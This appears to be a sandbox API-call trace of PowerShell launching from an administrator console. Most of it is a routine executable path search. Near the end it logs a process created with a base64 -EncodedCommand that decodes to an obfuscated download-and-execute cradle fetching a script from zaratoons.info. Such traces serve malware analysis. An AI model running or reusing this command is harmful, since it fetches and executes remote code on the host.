	[0828.680] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0828.680] SetErrorMode (uMode=0x1) returned 0x1
	[0828.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0828.681] SetErrorMode (uMode=0x1) returned 0x1
	[0828.681] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0828.681] SetErrorMode (uMode=0x1) returned 0x1
	[0828.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0828.682] SetErrorMode (uMode=0x1) returned 0x1
	[0828.682] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0828.682] SetErrorMode (uMode=0x1) returned 0x1
	[0828.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0828.682] SetErrorMode (uMode=0x1) returned 0x1
	[0828.682] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0828.683] SetErrorMode (uMode=0x1) returned 0x1
	[0828.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0828.683] SetErrorMode (uMode=0x1) returned 0x1
	[0828.683] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0828.683] SetErrorMode (uMode=0x1) returned 0x1
	[0828.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0828.684] SetErrorMode (uMode=0x1) returned 0x1
	[0828.684] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0828.684] SetErrorMode (uMode=0x1) returned 0x1
	[0828.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0828.684] SetErrorMode (uMode=0x1) returned 0x1
	[0828.685] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0828.685] SetErrorMode (uMode=0x1) returned 0x1
	[0828.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0828.685] SetErrorMode (uMode=0x1) returned 0x1
	[0828.685] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0828.686] SetErrorMode (uMode=0x1) returned 0x1
	[0828.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0828.686] SetErrorMode (uMode=0x1) returned 0x1
	[0828.686] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0828.686] SetErrorMode (uMode=0x1) returned 0x1
	[0828.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0828.687] SetErrorMode (uMode=0x1) returned 0x1
	[0828.687] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0828.687] SetErrorMode (uMode=0x1) returned 0x1
	[0828.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0828.687] SetErrorMode (uMode=0x1) returned 0x1
	[0828.687] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0828.688] SetErrorMode (uMode=0x1) returned 0x1
	[0828.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0828.688] SetErrorMode (uMode=0x1) returned 0x1
	[0828.688] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0828.688] SetErrorMode (uMode=0x1) returned 0x1
	[0828.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0828.689] SetErrorMode (uMode=0x1) returned 0x1
	[0828.689] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0828.691] SetErrorMode (uMode=0x1) returned 0x1
	[0828.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0828.691] SetErrorMode (uMode=0x1) returned 0x1
	[0828.692] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0828.692] SetErrorMode (uMode=0x1) returned 0x1
	[0828.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0828.692] SetErrorMode (uMode=0x1) returned 0x1
	[0828.692] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0828.693] SetErrorMode (uMode=0x1) returned 0x1
	[0828.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0828.693] SetErrorMode (uMode=0x1) returned 0x1
	[0828.693] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0828.693] SetErrorMode (uMode=0x1) returned 0x1
	[0828.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0828.694] SetErrorMode (uMode=0x1) returned 0x1
	[0828.694] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0828.694] SetErrorMode (uMode=0x1) returned 0x1
	[0828.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0828.695] SetErrorMode (uMode=0x1) returned 0x1
	[0828.695] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0828.695] SetErrorMode (uMode=0x1) returned 0x1
	[0828.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0828.695] SetErrorMode (uMode=0x1) returned 0x1
	[0828.695] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0828.696] SetErrorMode (uMode=0x1) returned 0x1
	[0828.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0828.696] SetErrorMode (uMode=0x1) returned 0x1
	[0828.696] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x1b843350
	[0828.697] FindNextFileW (in: hFindFile=0x1b843350, lpFindFileData=0x1c82dc10 | out: lpFindFileData=0x1c82dc10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0828.697] FindClose (in: hFindFile=0x1b843350 | out: hFindFile=0x1b843350) returned 1
	[0828.698] SetErrorMode (uMode=0x1) returned 0x1
	[0828.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c82dd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0828.699] SetErrorMode (uMode=0x1) returned 0x1
	[0828.699] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c82df30 | out: lpFileInformation=0x1c82df30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0828.699] SetErrorMode (uMode=0x1) returned 0x1
	[0828.700] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0828.700] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0828.700] CoTaskMemFree (pv=0x43e820) 
	[0828.702] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0828.702] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0828.702] CoTaskMemFree (pv=0x43e820) 
	[0828.705] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0828.706] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0828.706] CoTaskMemFree (pv=0x43e820) 
	[0831.430] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0831.430] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0831.430] CoTaskMemFree (pv=0x43e820) 
	[0831.444] CoTaskMemAlloc (cb=0x3b) returned 0x4f0a60
	[0831.444] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c82e118, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c82e118) returned 0x4550
	[0831.445] CoTaskMemFree (pv=0x4f0a60) 
	[0831.448] GetConsoleWindow () returned 0x10400
	[0831.457] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0831.457] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0831.457] CoTaskMemFree (pv=0x43e820) 
	[0831.461] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0831.461] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0831.461] CoTaskMemFree (pv=0x43e820) 
	[0831.467] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0831.467] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0831.467] CoTaskMemFree (pv=0x43e820) 
	[0833.963] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c82e160 | out: pNumArgs=0x1c82e160) returned 0x1b86b480*=""
	[0833.965] lstrlenW (lpString="-EncodedCommand") returned 15
	[0833.966] CoTaskMemAlloc (cb=0x22) returned 0x1b873d10
	[0833.966] RtlMoveMemory (in: Destination=0x1b873d10, Source=0x1b86b4a2, Length=0x20 | out: Destination=0x1b873d10) 
	[0833.966] CoTaskMemFree (pv=0x1b873d10) 
	[0833.966] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0833.966] CoTaskMemAlloc (cb=0x2f4) returned 0x46dfb0
	[0833.966] RtlMoveMemory (in: Destination=0x46dfb0, Source=0x1b86b4c2, Length=0x2f2 | out: Destination=0x46dfb0) 
	[0833.966] CoTaskMemFree (pv=0x46dfb0) 
	[0833.967] LocalFree (hMem=0x1b86b480) returned 0x0
	[0833.968] CoTaskMemAlloc (cb=0x804) returned 0x1b87fb60
	[0833.968] GetConsoleTitleW (in: lpConsoleTitle=0x1b87fb60, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0833.968] CoTaskMemFree (pv=0x1b87fb60) 
	[0833.978] CoTaskMemAlloc (cb=0x38e) returned 0x1b86b480
	[0833.978] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c82e0c0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2e6d900 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2e6d900*(hProcess=0x398, hThread=0x34c, dwProcessId=0x1d20, dwThreadId=0x1ff4)) returned 1
	[0848.973] CoTaskMemFree (pv=0x1b86b480) 
	[0848.974] CloseHandle (hObject=0x34c) returned 1
